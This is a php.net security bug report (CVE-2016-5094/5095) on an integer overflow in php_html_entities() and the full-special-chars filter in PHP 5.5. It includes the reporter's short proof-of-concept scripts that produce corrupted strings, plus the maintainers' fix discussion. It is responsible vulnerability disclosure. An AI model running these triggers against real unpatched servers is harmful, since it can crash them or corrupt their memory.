php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login

go to bug id or search bugs for

Sec Bug #72135 Integer Overflow in php_html_entities()
Submitted: 2016-05-01 18:47 UTC Modified: 2016-05-26 21:04 UTC
From: taoguangchen at icloud dot com Assigned: stas (profile)
Status: Closed Package: *General Issues
PHP Version: 5.5.35 OS: *
Private report: No CVE-ID: 2016-5094
View Developer Edit
Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.
Password:
Status:
Package:
Bug Type:
Summary:
From: taoguangchen at icloud dot com
New email:
PHP Version: OS:

 

 [2016-05-01 18:47 UTC] taoguangchen at icloud dot com 
Description:
------------
```
static void php_html_entities(INTERNAL_FUNCTION_PARAMETERS, int all)
{
	...
	size_t new_len;
	...
	RETVAL_STRINGL(replaced, (int)new_len, 0);
}
```

The new_len is defined as size_t, then to be a signed int in RETVAL_STRINGL(), that results in new_len into a negative value and get a corrupted string-typed ZVAL.

PoC1:
```
<?php

	ini_set('memory_limit', -1);
	$str = htmlspecialchars(str_repeat('&', 0xffffffff/5));
	var_dump(strlen($str));
	
?>
```

PoC2:
```
<?php

	ini_set('memory_limit', -1);
	$str = htmlspecialchars(str_repeat('&', 0xffffffff/5));
	md5($str);
	
?>
```

Fix:

Checking new_len

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2016-05-02 02:34 UTC] taoguangchen at icloud dot com 
A lot of functions with a corrupted string-typed ZVAL will able to lead to memory error, ex:

defined
class_exists
function_exists
...
trigger_error
date_default_timezone_set
hash_init
...
date
gmdate
...
collator_create
normalizer_normalize
grapheme_strlen
...
 [2016-05-04 14:22 UTC] taoguangchen at icloud dot com 
Another example:

```
ZEND_API int add_string_to_string(zval *result, const zval *op1, const zval *op2) /* {{{ */
{
	int length = Z_STRLEN_P(op1) + Z_STRLEN_P(op2);
	char *buf;

	if (IS_INTERNED(Z_STRVAL_P(op1))) {
		buf = (char *) emalloc(length+1);
		memcpy(buf, Z_STRVAL_P(op1), Z_STRLEN_P(op1));
	} else {
		buf = (char *) erealloc(Z_STRVAL_P(op1), length+1);
	}
	memcpy(buf + Z_STRLEN_P(op1), Z_STRVAL_P(op2), Z_STRLEN_P(op2));
```

PoC
```
<?php

ini_set('memory_limit', -1);
$str = htmlspecialchars(str_repeat('&', 0xffffffff/5));
"$str";

?>
```
 [2016-05-16 06:28 UTC] stas@php.net
-Assigned To: +Assigned To: stas
 [2016-05-16 06:28 UTC] stas@php.net 
Fix in security repo as 0da8b8b801f9276359262f1ef8274c7812d3dfda and in https://gist.github.com/d07b06bc967ecb94712f729198ae2e81
. Please verify.
 [2016-05-16 07:43 UTC] taoguangchen at icloud dot com 
The patch looks OK.
 [2016-05-17 12:55 UTC] taoguangchen at icloud dot com 
The similar bug in filter:

```
void php_filter_full_special_chars(PHP_INPUT_FILTER_PARAM_DECL)
{
	char *buf;
	size_t len;
	...
	buf = php_escape_html_entities_ex(Z_STRVAL_P(value), Z_STRLEN_P(value), &len, 1, quotes, SG(default_charset), 0 TSRMLS_CC);
	str_efree(Z_STRVAL_P(value));
	Z_STRVAL_P(value) = buf;
	Z_STRLEN_P(value) = len;
}
```

PoC:
```
<?php

ini_set('memory_limit', -1);
$var = str_repeat('&', 0xffffffff/5);
$var = filter_var($var, FILTER_SANITIZE_FULL_SPECIAL_CHARS);
echo "$var";

?>
```

You need to check all codes that call to php_escape_html_entities_ex/php_escape_html_entities.
 [2016-05-24 22:53 UTC] stas@php.net 
Improved fix in https://gist.github.com/8ef775c117d84ff15185953990a28576
 [2016-05-24 23:30 UTC] stas@php.net 
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=0da8b8b801f9276359262f1ef8274c7812d3dfda
Log: Fix bug #72135 - don't create strings with lengths outside int range
 [2016-05-24 23:30 UTC] stas@php.net
-Status: Assigned +Status: Closed
 [2016-05-25 00:21 UTC] stas@php.net 
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=0da8b8b801f9276359262f1ef8274c7812d3dfda
Log: Fix bug #72135 - don't create strings with lengths outside int range
 [2016-05-25 03:51 UTC] stas@php.net 
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=0da8b8b801f9276359262f1ef8274c7812d3dfda
Log: Fix bug #72135 - don't create strings with lengths outside int range
 [2016-05-25 03:52 UTC] stas@php.net 
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=0da8b8b801f9276359262f1ef8274c7812d3dfda
Log: Fix bug #72135 - don't create strings with lengths outside int range
 [2016-05-25 03:53 UTC] stas@php.net 
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=0da8b8b801f9276359262f1ef8274c7812d3dfda
Log: Fix bug #72135 - don't create strings with lengths outside int range
 [2016-05-26 21:04 UTC] kaplan@php.net
-CVE-ID: +CVE-ID: 2016-5094
 [2016-05-26 21:04 UTC] kaplan@php.net 
Use CVE-2016-5094 for the original report that had the "[2016-05-16
06:28 UTC] Fix in security repo as
0da8b8b801f9276359262f1ef8274c7812d3dfda" response. Use CVE-2016-5095
for the additional issue reported in the "[2016-05-17 12:55 UTC]"
comment.
 [2016-07-04 15:02 UTC] kaplan@php.net 
Notice CVE-2016-5095 was fixed in 41fc3c76e97a36ff3b505da7d704ca17bb171fdf also part of PHP 5.5.36
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved. 		Last updated: Thu Nov 21 12:01:29 2024 UTC